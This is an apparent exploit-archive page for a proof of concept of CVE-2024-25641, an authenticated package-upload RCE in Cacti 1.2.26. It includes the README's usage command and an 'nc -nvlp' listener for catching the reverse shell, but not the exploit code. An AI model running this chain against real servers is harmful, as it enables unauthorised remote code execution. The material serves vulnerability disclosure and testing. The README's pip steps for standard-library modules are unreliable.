CVE-2024-25641 PoC — Cacti 安全漏洞

Source

https://github.com/Safarchand/CVE-2024-25641

Associated Vulnerability

Title:Cacti 安全漏洞 (CVE-2024-25641)
Description:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据，使用RRDtool绘画图形进行分析，并提供数据和用户管理功能。 Cacti 1.2.27之前版本存在安全漏洞，该漏洞源于存在任意文件写入漏洞，允许经过身份验证的用户在Web服务器上执行任意PHP代码。

Description

PoC for CVE-2024-25641 Authenticated RCE on Cacti v1.2.26

Readme

# Cacti CVE-2024-25641 Authenticated Package Upload RCE Proof of Concept (PoC)

This script is a Proof of Concept (PoC) for exploiting the CVE-2024-25641 vulnerability in Cacti, a web-based monitoring tool. The script automates the process of authenticating with the application, uploading a malicious package, and triggering a reverse shell.

## Requirements

- Python 3.x
- `requests` library
- `argparse` library
- `re` library

You can install the required Python library using pip3:

```bash
pip3 install requests
pip3 install argparse
pip3 install re
```

## Usage
(make sure to place the **test.xml.gz** in the same directory as the **exploit.py**)

```bash
python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]
```

## Start nc listener

```bash
nc -nvlp <port>
```

File Snapshot


 [4.0K]  /data/pocs/a0c63c189ba073129de9924b1a31ea3bebf8670c
├── [4.2K]  exploit.py
├── [ 820]  README.md
└── [1.1K]  test.xml.gz

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!